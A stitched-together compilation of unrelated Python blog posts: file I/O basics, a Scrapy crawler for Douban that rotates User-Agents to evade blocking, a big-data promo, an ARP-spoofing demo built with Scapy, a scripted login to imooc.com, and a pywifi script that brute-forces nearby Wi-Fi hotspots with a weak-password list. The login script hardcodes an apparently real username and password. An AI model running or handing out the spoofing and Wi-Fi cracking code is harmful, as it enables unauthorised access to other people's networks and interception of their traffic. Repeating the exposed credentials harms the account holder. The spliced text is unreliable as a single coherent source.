False

writelines(self, lines):

Writes a sequence of strings to the file; the sequence can be any iterable that produces strings, typically a list of strings.

f = open("wr_lines.txt", "w")
f.writelines(["11", "22", "33"])
f.close()

Execution result: wr_lines.txt now contains 112233.

read(self, n=None):

Reads the specified number of bytes; with no argument it reads everything.

f = open("wr_lines.txt", "r")
print(f.read(3))
f.seek(0)
print(f.read())
f.close()

Execution result:

C:\Python35\python.exe F:/Python_code/sublime/Day06/file.py
112
112233

write(self, s):

Writes content to the file.

f = open("wr_lines.txt", "w")
f.write("abcabcabc")
f.close()

File contents:

abcabcabc

Opening multiple files at the same time

To avoid forgetting to close a file after opening it, you can use a context manager:

with open('log', 'r') as f:
    # code block

This way, when the with block finishes executing, the file is automatically closed and its resources released.

From Python 2.7 onward, with can also manage the contexts of multiple files at once:

with open('log1') as obj1, open('log2') as obj2:
    pass
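As a usage sketch of that pattern (log1 and log2 are just the placeholder names from the line above), copying one file into another becomes a three-liner, with both files closed automatically:

with open('log1', 'r') as src, open('log2', 'w') as dst:
    for line in src:
        dst.write(line)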



Scrapy Learning (3): Scraping Douban Book Information

Preface

Scrapy Learning (1): Installation

Scrapy Learning (2): Getting Started

With the foundations laid in the previous two posts, we can start crawling the information we are interested in from the web. Since I have not yet learned how to simulate logins, I am starting with sites like Douban that do not require logging in.

My development environment is Win7 + PyCharm + Python 3.5 + MongoDB.

The crawler's target is the basic information of every book under Douban's Japanese literature tag.

Creating the project

scrapy startproject douban

Then move into the douban directory:

scrapy genspider book book.douban.com

This generates the corresponding BookSpider template in the spiders directory.

Writing the Item

Define the data model we need in items.py:

class BookItem(scrapy.Item):
    book_name = scrapy.Field()
    book_star = scrapy.Field()
    book_pl = scrapy.Field()
    book_author = scrapy.Field()
    book_publish = scrapy.Field()
    book_date = scrapy.Field()
    book_price = scrapy.Field()

Writing the Spider

Visit Douban's Japanese literature tag and put its URL into start_urls. Then, with the help of Chrome's developer tools, you can see that each book sits inside ul#subject-list > li.subject-item.

class BookSpider(scrapy.Spider):
    ...
    def parse(self, response):
        sel = Selector(response)
        book_list = sel.css('#subject_list > ul > li')
        for book in book_list:
            item = BookItem()
            item['book_name'] = book.xpath('div[@class="info"]/h2/a/text()').extract()[0].strip()
            item['book_star'] = book.xpath("div[@class='info']/div[2]/span[@class='rating_nums']/text()").extract()[0].strip()
            item['book_pl'] = book.xpath("div[@class='info']/div[2]/span[@class='pl']/text()").extract()[0].strip()
            pub = book.xpath('div[@class="info"]/div[@class="pub"]/text()').extract()[0].strip().split('/')
            item['book_price'] = pub.pop()
            item['book_date'] = pub.pop()
            item['book_publish'] = pub.pop()
            item['book_author'] = '/'.join(pub)
            yield item

Test whether the code works:

scrapy crawl book -o items.json

Strangely, items.json contains no data. Looking back at the DEBUG messages in the console:

2017-02-04 16:15:38 [scrapy.core.engine] INFO: Spider opened
2017-02-04 16:15:38 [scrapy.extensions.logstats] INFO: Crawled 0 pages (at 0 pages/min), scraped 0 items (at 0 items/min)
2017-02-04 16:15:38 [scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023
2017-02-04 16:15:39 [scrapy.core.engine] DEBUG: Crawled (403) <GET https://book.douban.com/robot... (referer: None)
2017-02-04 16:15:39 [scrapy.core.engine] DEBUG: Crawled (403) <GET https://book.douban.com/tag/%... (referer: None)

The pages come back with status code 403: the server has recognised us as a crawler and refused access.

We can set USER_AGENT in settings to disguise ourselves as a browser:

USER_AGENT = "Mozilla/4.0 (compatible; MSIE 6.0; windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

Try again and items.json now has data. On closer inspection, though, it only contains the first page. To crawl everything, the spider needs to finish the current page, automatically pick up the URL of the next page, and repeat until all the data has been fetched.

So we rework the spider:

...
    def parse(self, response):
        sel = Selector(response)
        book_list = sel.css('#subject_list > ul > li')
        for book in book_list:
            item = BookItem()
            try:
                item['book_name'] = book.xpath('div[@class="info"]/h2/a/text()').extract()[0].strip()
                item['book_star'] = book.xpath("div[@class='info']/div[2]/span[@class='rating_nums']/text()").extract()[0].strip()
                item['book_pl'] = book.xpath("div[@class='info']/div[2]/span[@class='pl']/text()").extract()[0].strip()
                pub = book.xpath('div[@class="info"]/div[@class="pub"]/text()').extract()[0].strip().split('/')
                item['book_price'] = pub.pop()
                item['book_date'] = pub.pop()
                item['book_publish'] = pub.pop()
                item['book_author'] = '/'.join(pub)
                yield item
            except:
                pass
        nextPage = sel.xpath('//div[@id="subject_list"]/div[@class="paginator"]/span[@class="next"]/a/@href').extract()[0].strip()
        if nextPage:
            next_url = 'https://book.douban.com' + nextPage
            yield scrapy.http.Request(next_url, callback=self.parse)

Here scrapy.http.Request calls back into parse. The try...except is there because Douban book entries are not all formatted consistently; problematic entries are simply discarded.

Getting past anti-crawling measures

Generally, if the crawler runs too fast, the site will start refusing our requests, so we set a crawl delay in settings and turn off cookies:

DOWNLOAD_DELAY = 2

COOKIES_ENABLED = False

Alternatively, we can rotate browser User-Agents or IP addresses to avoid being blocked by the site.

Below, changing the UA is used as the example.

In middlewares.py, write a middleware that swaps in a random UA; every request passes through the middleware.

When process_request returns None, Scrapy continues handing the request on to the other middlewares.

import random

class RandomUserAgent(object):
    def __init__(self, agents):
        self.agents = agents

    @classmethod
    def from_crawler(cls, crawler):
        return cls(crawler.settings.getlist('USER_AGENTS'))

    def process_request(self, request, spider):
        request.headers.setdefault('User-Agent', random.choice(self.agents))

Then configure it in settings:

DOWNLOADER_MIDDLEWARES = {
    'douban.middlewares.RandomUserAgent': 1,
}
...
USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    ...
]

Run the program again and the crawl clearly goes much more smoothly.

Saving to MongoDB

Next we persist the data to a database (MongoDB is used as the example here; saving to another database works the same way).

This part is handled in pipelines. Before that, we need to install the database driver:

pip install pymongo

Write the configuration in settings:

# MONGODB configuration
MONGODB_SERVER = 'localhost'
MONGODB_PORT = 27017
MONGODB_DB = 'douban'
MONGODB_COLLECTION = "book"

Then, in pipelines.py:

from pymongo import MongoClient
from scrapy.conf import settings   # older Scrapy API, as used in this tutorial
from scrapy import log             # older Scrapy logging API

class MongoDBPipeline(object):
    def __init__(self):
        connection = MongoClient(
            host=settings['MONGODB_SERVER'],
            port=settings['MONGODB_PORT']
        )
        db = connection[settings['MONGODB_DB']]
        self.collection = db[settings['MONGODB_COLLECTION']]

    def process_item(self, item, spider):
        self.collection.insert(dict(item))
        log.msg("Book added to MongoDB database!", level=log.DEBUG, spider=spider)
        return item
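One detail the post does not spell out: for Scrapy to actually run this pipeline, it also has to be enabled in settings, along the lines of the snippet below (the module path assumes the class lives in douban/pipelines.py, as the text above implies).

ITEM_PIPELINES = {
    'douban.pipelines.MongoDBPipeline': 300,   # lower numbers run earlier
}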

Other

To save the DEBUG output printed to the console while the project runs into a log file, just set this in settings:

LOG_FILE = "logs/book.log"

Project code: Douban book crawler

Why does big data choose Python?


Connect the data points, and give everyone the value of faster time to insight.

Python is a powerful, flexible, open, and easy-to-learn language that is convenient to use and has strong libraries for data manipulation and analysis. Its simple syntax makes it easy for programming newcomers to pick up, and for people coming from Matlab, C/C++, Java, or Visual Basic, Python offers a rare combination: a full programming language that is also as convenient for analysis and quantitative computing as those tools.



Over the past decade, Python has been used in scientific computing and in highly quantitative fields such as finance, oil and gas, physics, and signal processing. It has been used to improve the design of the Space Shuttle, to process images from the Hubble Space Telescope, and as a tool in the physics experiments that led to the discovery of the Higgs boson (the so-called "God particle").


At the same time, Python has been used to build massively scalable web applications such as YouTube and powers much of Google's internal infrastructure. Companies like Disney, Sony, DreamWorks, and Lucasfilm's ILM rely on Python to coordinate large clusters of computer-graphics servers producing the imagery for blockbuster films. According to the TIOBE index, Python is one of the most popular programming languages in the world, ranked above Perl, Ruby, and JavaScript.



Python is a powerful language that has been used successfully in big data and business data analytics. The focus is on giving end users and domain experts the most expressive, easiest-to-use tools.

Every business unit is being transformed by the modern flood of data. For some this spells ruin; for others it creates enormous opportunity. Those who thrive in this environment will do so by quickly turning data into meaningful business insight and competitive advantage. Business analysts and data scientists need agile tools, not to be shackled by legacy information architectures.

Python is easy to learn and use, yet powerful enough to tackle even the hardest problems in almost any field. It integrates seamlessly with existing IT infrastructure and is platform independent. Companies of every size and in every field, from the largest investment banks to the smallest web-app startups, are using Python to run their business and manage their data.

Happy Chinese New Year, everyone!

A Simple ARP Attack with Python


The goal of today's experiment is to exploit a flaw in how ARP works to carry out a network attack.



Network topology

As shown in the topology above, two routers and the attacker (I am using Linux) are connected to the same LAN. In this experiment we ARP-spoof R1 so that R1 believes R2's MAC address is the attacker's MAC address (R1 thinks it is sending packets to R2, but they all end up at the attacker).

First, the real MAC addresses of the three devices:



R1's normal ARP cache

The figure above shows the ARP entries cached on R1 after it successfully pings R2 and the attacker.

R1:ca01.2828.0000

R2:ca02.2434.0000

Attacker: 0800.27d6.9d83

Install Scapy on Linux: pip3 install scapy-python3. (As in previous articles, the goal is a simple demonstration; please look up any details not covered here yourself.)



The complete Python code

In the code shown above (kept as short as possible for beginners, using only what the experiment needs), the first few lines define the IP and MAC addresses involved and need no explanation; the key part is the last two lines:

pkt = Ether(src=Hack_MAC, dst=R1_MAC) / ARP(hwsrc=Hack_MAC, psrc=R2_IP, hwdst=R1_MAC, pdst=R1_IP, op=2)

This line builds an ARP packet with a source IP, source MAC, destination IP, and destination MAC. It is destined for R1, and the source IP impersonates R2, which is easy enough to follow. Note the op=2 at the end: op=1 means an ARP request and op=2 means an ARP reply (see the capture screenshots in the previous article; they are not repeated here).

sendp(pkt, iface='enp0s3') sends the packet we just built out of the enp0s3 network interface.
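Since the complete script only appears in the screenshot above, here is a minimal sketch of what it plausibly looks like. The MAC addresses are the ones listed earlier (rewritten in colon notation); the IP addresses are placeholders of my own, so adjust everything to your own lab.

#!/usr/bin/env python3
from scapy.all import Ether, ARP, sendp

# Placeholder addresses -- substitute the real ones from your own topology
R1_IP = "192.168.1.1"
R2_IP = "192.168.1.2"
R1_MAC = "ca:01:28:28:00:00"      # R1, from the ARP cache screenshot
Hack_MAC = "08:00:27:d6:9d:83"    # the attacker's NIC

# Forge an ARP reply (op=2) telling R1 that R2_IP lives at the attacker's MAC
pkt = Ether(src=Hack_MAC, dst=R1_MAC) / ARP(hwsrc=Hack_MAC, psrc=R2_IP,
                                            hwdst=R1_MAC, pdst=R1_IP, op=2)

# Send the frame out of the attacker's interface
sendp(pkt, iface='enp0s3')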

Now run the Python script:



Running the script

You can see that one ARP reply packet was sent.

Now look at R1's ARP cache again:



Experiment result

R1's ARP cache has been modified and now points, incorrectly, at the attacker. The (temporary) spoofing goal has been achieved and the experiment is complete. (I will not go into what ARP attacks can be used for...)

To repeat: this article is only a simple demonstration and cuts some corners; it only needs to achieve the experimental effect. Readers who want to go deeper can study and improve the code themselves.


Python Simulated-Login Practice: Logging in to imooc.com


I am writing this article on my third day of learning Python (or maybe the fourth :( ). Python is the second interpreted language I have picked up (the first was JavaScript).

Honestly, I have long wanted to record my learning in a blog, but like keeping a diary, I kept giving up partway. -.-

So today I decided to give myself a proper start~

My way of learning is to go straight for the goal: when I hit a problem, I search Baidu for blog posts and sites, and switch to Google when Baidu fails. It works fast, but obviously the fundamentals end up a bit thin.

So after learning basic Python syntax, I went straight for web crawlers!

----------------------------------- end of the long preamble ---------------------------------------------

Today I want to share the experience of my three days learning to write a spider, hoping it points some fellow beginners in the right direction and leaves a mark on my own Python journey.

In my humble view, there are two ways to simulate logging in to a website:

One is to collect the cookies by hand.

Log in to the site in a browser, then open the developer tools, visit any page, pick a request, and copy the cookie out of it.

The other is to have Python collect the cookies.

That is what this article covers in detail. See below.

Let me use imooc.com as the example to walk through simulating a website login.

Getting started

I am used to writing crawlers with urllib2 + cookielib, so the code starts like this:

# coding=utf8
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import urllib2
import urllib
import cookielib
# The above is boilerplate.
# Below: create a CookieJar to manage cookies, build an opener around it, and install it into urllib2
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
opener.addheaders = [('user-agent', 'Mozilla/5.0')]

opener.addheaders lets you add headers as a list, which is very convenient.
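As a small illustration, several headers can be set at once; the extra values below are my own examples and not taken from the original post:

opener.addheaders = [
    ('user-agent', 'Mozilla/5.0'),
    ('accept-language', 'zh-CN,zh;q=0.8'),   # illustrative extra header
    ('referer', 'http://www.imooc.com'),     # illustrative extra header
]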

Next

A cookie is a small file the server uses to record information about a user. Cookies can sometimes intrude on privacy, but for storing login state and enabling automatic login they are very handy.

They work like this:

1. On your first visit, the server's response contains a few Set-Cookie entries, and the browser quietly records them as cookies.
2. When you click log in and submit your username, password, and other required fields, the browser posts your information together with some of those cookies.
3. After a successful login the browser receives another quiet message from the server: a few important cookies, which it saves.
4. If you keep the browser open and visit other pages on the site, the browser sends some of these cookies along, and you find you are already logged in.
5. If you ticked something like "remember me" or "keep me logged in for 7 days", the browser also receives some long-lived cookies (good for a week or two) so you can log in automatically tomorrow, the day after, and so on.

Now that we know how cookies work, let's visit the home page and grab some.

Here is what I wrote:

# First, a few URLs
url_login = 'http://www.imooc.com/passport/user/login'
url_index = 'http://www.imooc.com'
url_test = 'http://www.imooc.com/user/setbindsns'
data = {
    'username': '*********',
    'password': '*******',
    'verify': '',
    'remember': '1',
    'pwencode': '0',
    'referer': 'http://www.imooc.com'
}
data_encoded = urllib.urlencode(data)
# GET the home page to pick up cookies
req_index = urllib2.Request(url_index)
res_index = opener.open(req_index)

We can print the cookies to take a look:

print cj._cookies

{'www.imooc.com': {'/': {'phpSESSID': Cookie(version=0, name='PHPSESSID', value='3q1c66hds4h054f19ciqb4rtg2', port=None, port_specified=False, domain='www.imooc.com', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={}, rfc2109=False)}}, '.imooc.com': {'/': {'imooc_isnew_ct': Cookie(version=0, name='imooc_isnew_ct', value='1486280759', port=None, port_specified=False, domain='.imooc.com', domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False, expires=1517816759, discard=False, comment=None, comment_url=None, rest={}, rfc2109=False), 'cvde': Cookie(version=0, name='cvde', value='5896d8376631d-1', port=None, port_specified=False, domain='.imooc.com', domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={}, rfc2109=False), 'imooc_isnew': Cookie(version=0, name='imooc_isnew', value='1', port=None, port_specified=False, domain='.imooc.com', domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False, expires=1517816759, discard=False, comment=None, comment_url=None, rest={}, rfc2109=False), 'imooc_uuid': Cookie(version=0, name='imooc_uuid', value='d6a73549-4d53-47b6-90bc-28888d3438b8', port=None, port_specified=False, domain='.imooc.com', domain_specified=True, domain_initial_dot=True, path='/', path_specified=True, secure=False, expires=1517816759, discard=False, comment=None, comment_url=None, rest={}, rfc2109=False)}}}

What is all this? I have no idea. Let it go.

Then

Let's take the cookies and log in! Not sure which one to bring? Bring them all!

req_login = urllib2.Request(url_login, data_encoded)
res_login = opener.open(req_login)

Let's try writing the result out to an HTML file:

imooc = open('e:/imooc.html', 'w')
imooc.write(res_login.read())
imooc.close()

When we open it:

This sure doesn't look like HTML. Normally you would get an HTML page back, but this string of symbols stumped a newbie with three days of Python.

One piece of information stands out: "msg" : "\u6210\u529f" is clearly a Unicode-escaped string; decoded, it means 成功, i.e. "success".

Quiet celebration. Since the login succeeded, the useful information must be hiding somewhere in that string of symbols.
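Since that blob looks like JSON, one way to pull the useful fields out of it is json.loads rather than eval; this is just a sketch built around the keys that show up in the response above and in the final script at the end of the post (msg and data.url):

import json

login_body = res_login.read()          # read the response once; a second read() returns ''
res_dict = json.loads(login_body)      # safer than eval() for parsing a JSON response
print res_dict['msg']                  # u'\u6210\u529f', i.e. 成功 / "success"
url_ssologin = res_dict['data']['url'][0]   # the SSO URL used in the final script below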

At this point the right approach is to take those two URLs and the uid and keep digging with the developer tools.

...

But I took a small detour instead.

The brute reverse-engineering approach

I decided to copy the post-login cookies and test them one by one to find out which ones the login actually needs.

Simple enough: delete them one at a time and see when the login stops working...

...

After filtering, I found the two cookies we need: loginstate and apsid.

So I went looking for the apsid entry among nearly a hundred cookies.

...

Found it!



And the URL being requested is one of the two we got earlier! It just carries a few extra parameters.

In practice, a GET to either of the two URLs is enough to obtain the cookie we need.

More quiet celebration.

We need three parameters: token (already carried in the URL), callback, and _ (yes, an underscore -.-).

Testing shows the callback parameter is a fixed value.

Fine, so let's search for where the underscore's value comes from.

A look at the cookies shows it is the value of imooc_isnew_ct.

At this point we are basically done~

The full code:

# coding=utf8
# Final version
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import urllib2
import urllib
import cookielib
import re

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
opener.addheaders = [('user-agent', 'Mozilla/5.0')]

url_login = 'http://www.imooc.com/passport/user/login'
url_index = 'http://www.imooc.com'
url_test = 'http://www.imooc.com/user/setbindsns'
data = {
    'username': '13153154784',
    'password': 'liuweidong',
    'verify': '',
    'remember': '1',
    'pwencode': '0',
    'referer': 'http://www.imooc.com'
}
data_encoded = urllib.urlencode(data)

# GET the home page to pick up cookies
req_index = urllib2.Request(url_index)
res_index = opener.open(req_index)
print cj._cookies
print

# POST to the login page
req_login = urllib2.Request(url_login, data_encoded)
res_login = opener.open(req_login)
login_body = res_login.read()   # read once; a second read() would return an empty string
print login_body
res_dict = eval(login_body)
url_ssologin = res_dict['data']['url'][0]
print url_ssologin
url_ssologin = re.sub(r'\\/', '/', url_ssologin)
print url_ssologin
params = {
    'callback': 'jQuery19106404770042720387_1486274878204',
    '_': str(cj._cookies['.imooc.com']['/']['imooc_isnew_ct'])[23:33]
}
url_ssologin = url_ssologin + '&' + urllib.urlencode(params)

# GET the SSO login page
req_sso = urllib2.Request(url_ssologin)
res_sso = opener.open(req_sso)
# print res_sso.read()
# print cj._cookies['.imooc.com']['/']['loginstate']

req_test = urllib2.Request(url_test)
res_test = opener.open(req_test)
imooc = open('c:/users/asus/desktop/imooc.html', 'w')
imooc.write(res_test.read())
imooc.close()

I actually ran into plenty of problems and took plenty of detours along the way; thanks to a certain expert for the selfless help :) This is my first blog post, and comments and corrections are welcome~

How to Crack a Wi-Fi Password? One Python Script Does It



The "short" Spring Festival holiday is over, and everyone is presumably back at work today. In the new year, let's keep learning Python together. Onward in the Year of the Rooster~~

This article is for reference only; please don't abuse it.

Original post: https://my.oschina.net/Apathy/blog/821039

Environment setup

python 2.7

A passable Linux box

A decent-enough wireless NIC

The pywifi module

A weak-password dictionary

Clear any existing Wi-Fi connection records from the system (very important!!!)

First, a note: this module is a bit half-baked on Windows, because the author did not wrap WLANSECURITYATTRIBUTES properly when calling WLANAPI, so running it on Linux is recommended. I tested on Kali 2.0, whose bundled Python is 2.7.6, and installed the module directly with pip install pywifi.

Importing the modules

Only these three modules are used. Note that the check if reply != b'OK\n': inside the send_cmd_to_wpas method of pywifi's wifiutil_linux.py needs to be modified, or you will see a lot of noisy messages.

from pywifi import *
import time
import sys

Preparing the dictionary

Efficiency matters, because this thing really is slow to run. Below are the top 10 weak Wi-Fi passwords most commonly used in China:

12345678

123456789

88888888

1234567890

00000000

87654321

66668888

11223344

147258369

11111111
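The script below reads the dictionary path from sys.argv[1], so the list above just needs to end up in a plain text file, one password per line. A throwaway way to generate it (wordlist.txt is an arbitrary name of my own):

# Write the top-10 weak passwords to a dictionary file, one per line
passwords = ["12345678", "123456789", "88888888", "1234567890", "00000000",
             "87654321", "66668888", "11223344", "147258369", "11111111"]
with open("wordlist.txt", "w") as f:
    f.write("\n".join(passwords) + "\n")

The cracker would then be launched as python crack.py wordlist.txt (the script name is assumed).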

Configuring the scanner

A scan duration of 15-20 seconds is recommended. The per-password test timeout can be whatever you like; given the relationship between authentication speed and distance, I usually set it to around 15 seconds. Anything longer is pointless: even if such a hotspot does crack, its signal will not be any good.

def main():
    # Scan duration
    scantimes = 3
    # Timeout for testing a single password
    testtimes = 15
    output = sys.stdout
    # Path of the results file
    files = "TestRes.txt"
    # Password dictionary, one candidate per line
    keys = open(sys.argv[1], "r").readlines()
    print "|KEYS %s" % (len(keys))
    # Instantiate a PyWiFi object
    wifi = PyWiFi()
    # Pick a wireless interface and assign it to iface
    iface = wifi.interfaces()[0]
    # Scan through iface for scantimes seconds and collect the nearby hotspots
    scanres = scans(iface, scantimes)
    # Number of hotspots found nearby
    nums = len(scanres)
    print "|SCAN GET %s" % (nums)
    print "%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s" % (
        "-" * 70, 6, "WIFIID", 18, "SSID OR BSSID", 2, "N", 4, "time",
        7, "signal", 10, "KEYNUM", 10, "KEY", "=" * 70)
    # Test each hotspot in turn
    for i, x in enumerate(scanres):
        # When a test succeeds, the result is appended to the results file
        res = test(nums - i, iface, x, keys, output, testtimes)
        if res:
            open(files, "a").write(res)

Scanning nearby hotspots

def scans(face, timeout):
    # Start scanning
    face.scan()
    time.sleep(timeout)
    # Collect the scan results after the wait
    return face.scan_results()

Testing a hotspot

A later improvement worth making: write the scan data to a database so that the same hotspot is not tested repeatedly, and the results are easier to browse.
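That suggestion is not implemented in the post; as a minimal sketch of what it could look like with SQLite (the table and column names are my own), before moving on to the test routine itself:

import sqlite3

conn = sqlite3.connect("scan_history.db")
conn.execute("CREATE TABLE IF NOT EXISTS tried (bssid TEXT, key TEXT, ok INTEGER)")

def already_tried(bssid, key):
    # True if this (hotspot, password) pair has been attempted before
    cur = conn.execute("SELECT 1 FROM tried WHERE bssid = ? AND key = ?", (bssid, key))
    return cur.fetchone() is not None

def record(bssid, key, ok):
    # Remember the attempt so a rerun can skip it
    conn.execute("INSERT INTO tried VALUES (?, ?, ?)", (bssid, key, int(ok)))
    conn.commit()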

def test(i, face, x, key, stu, ts):
    # Show the network name; fall back to the BSSID for some Chinese SSIDs
    showID = x.bssid if len(x.ssid) > len(x.bssid) else x.ssid
    # Iterate over the dictionary and try each password
    for n, k in enumerate(key):
        x.key = k.strip()
        # Remove all saved hotspot profiles
        face.remove_all_network_profiles()
        # Add the prepared profile and try to connect
        face.connect(face.add_network_profile(x))
        # Initialise the status code; starting at 0 would cause logic errors
        code = 10
        t1 = time.time()
        # Poll the status: 0 means the password was wrong; on timeout, move on to the next one
        while code != 0:
            time.sleep(0.1)
            code = face.status()
            now = time.time() - t1
            if now > ts:
                break
            stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s" % (
                6, i, 18, showID, code, 5, now, 7, x.signal,
                10, len(key) - n, 10, k.replace("\n", "")))
            stu.flush()
        # Status 4 means the connection succeeded
        if code == 4:
            face.disconnect()
            return "%-*s| %s | %*s |%*s\n" % (20, x.ssid, x.bssid, 3, x.signal, 15, k)
    return False

Example run

This run used 11 weak passwords, found 20 hotspots, and then started its painfully slow grind. The columns mean:

WIFIID           the hotspot's id; it counts down by 1 as each hotspot is processed

SSID OR BSSID    the hotspot's SSID, or its MAC address

N                the connection status code for the hotspot

time             the time spent so far

signal           the hotspot's signal strength; the smaller the better

KEYNUM           the id of the password being tested; it counts down by 1 per attempt

KEY              the password currently being tested


php?url=0Fa6NCxxhH" alt="WiFi密码怎么破?一个Python脚本搞定" />

The results were not bad: people's security awareness is no longer as dire as it used to be. Only one or two hotspots fell, and one of them was my own - -


Header image: Pexels, CC0 licensed.
